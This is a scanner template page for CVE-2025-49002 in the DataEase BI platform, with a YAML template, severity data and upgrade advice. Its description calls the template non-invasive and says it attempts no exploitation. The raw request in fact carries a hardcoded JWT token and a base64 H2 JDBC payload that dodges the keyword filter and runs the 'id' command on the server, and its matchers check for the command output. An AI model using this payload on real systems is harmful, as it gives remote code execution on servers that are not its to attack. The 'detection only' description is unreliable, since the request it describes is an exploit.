DataEase - Remote Code Execution
CVE-2025-49002
Early Release
Description
DataEase is an open-source business intelligence and data visualization platform. Public advisories state that CVE-2025-49002 is related to a bypass in the previous fix for CVE-2025-32966 involving case-insensitive handling of restricted H2 JDBC keywords. This template is a non-invasive detection template intended only to identify exposed DataEase instances and extract possible version hints for manual verification. It does not attempt authentication bypass, JDBC exploitation, or command execution.
Severity
High
Exploit Probability
0%
Affected Product
dataease
Published Date
April 20, 2026
Template Author
weqi
CVE-2025-49002.yaml
id: CVE-2025-49002
info:
name: DataEase - Remote Code Execution
author: WeQi
severity: high
description: |
DataEase is an open-source business intelligence and data visualization platform. Public advisories state that CVE-2025-49002 is related to a bypass in the previous fix for CVE-2025-32966 involving case-insensitive handling of restricted H2 JDBC keywords. This template is a non-invasive detection template intended only to identify exposed DataEase instances and extract possible version hints for manual verification. It does not attempt authentication bypass, JDBC exploitation, or command execution.
impact: |
If the target is running an affected DataEase version, an attacker may exploit the vulnerable logic as part of a broader attack chain. Public exposure of the application increases risk.
remediation: |
Upgrade DataEase to 2.10.10 or later, restrict public access to management/API endpoints, and review whether vulnerable datasource-related interfaces are exposed.
reference:
- https://github.com/dataease/dataease/security/advisories/GHSA-999m-jv2p-5h34
- https://nvd.nist.gov/vuln/detail/CVE-2025-49002
classification:
cve-id: CVE-2025-49002
epss-score: 0.0042
epss-percentile: 0.61975
cwe-id: CWE-290
metadata:
verified: true
max-request: 1
vendor: fit2cloud
product: dataease
fofa-query: app="FIT2CLOUD-DataEase"
shodan-query: http.html:"DataEase"
tags: cve,cve2025,dataease,fit2cloud
http:
- raw:
- |
POST /de2api/datasource/getSchema HTTP/1.1
Host: {{Hostname}}
X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
Content-Type: application/json
{
"id": "",
"name": "11",
"description": "",
"type": "h2",
"apiConfiguration": [],
"paramsConfiguration": [],
"enableDataFill": false,
"configuration": "eyJkYXRhQmFzZSI6IiIsImpkYmMiOiJqZGJjOmgyOm1lbTp0ZXN0O2luXFxpdD1EUk9QIEFMSUFTIElGIEVYSVNUUyBFWEVDXFw7Q1JFQVRcXEUgQUxJQVMgRVhFQyBBUyAkJHZvaWQgZXhlYygpIHRocm93cyBFeGNlcHRpb24ge2phdmEubGFuZy5TdHJpbmcgcyA9IG5ldyBqYXZhLnV0aWwuU2Nhbm5lcihqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhcImlkXCIpLmdldElucHV0U3RyZWFtKCkpLnVzZURlbGltaXRlcihcIlxcQVwiKS5uZXh0KClcXDt0aHJvdyBuZXcgamF2YS5sYW5nLkV4Y2VwdGlvbihzKVxcO30kJFxcO0NBTEwgRVhFQygpXFw7IiwidXJsVHlwZSI6ImpkYmNVcmwiLCJzc2hUeXBlIjoicGFzc3dvcmQiLCJleHRyYVBhcmFtcyI6IiIsInVzZXJuYW1lIjoiMTIzIiwiIHBhc3N3b3JkIjoiMTIzIiwiaG9zdCI6IiIsImF1dGhNZXRob2QiOiIiLCJwb3J0IjowLCJpbml0aWFsUG9vbFNpemUiOjUsIm1pblBvb2xTaXplIjo1LCJtYXhQb29sU2l6ZSI6NSwicXVlcnlUaW1lb3V0IjozMH0"
}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Exception calling", "exec():")'
- 'contains(content_type, "application/json")'
- 'regex("uid=[0-9]+.*gid=[0-9]+.*", body)'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022001bd9803831c3c0768485465c47cb286b005b2bed96575a9c4faaec49a1852e9022100ed959c23f478c7d7850164aad4e3b51728c0dcf3b6e677f336a21081a12d235f:922c64590222798bb761d5b6d8e729507.5Severity
CVSS Metrics
CVE ID:
cve-2025-49002
CWE ID:
cwe-290
Remediation Steps
Upgrade DataEase to 2.10.10 or later, restrict public access to management/API endpoints, and review whether vulnerable datasource-related interfaces are exposed.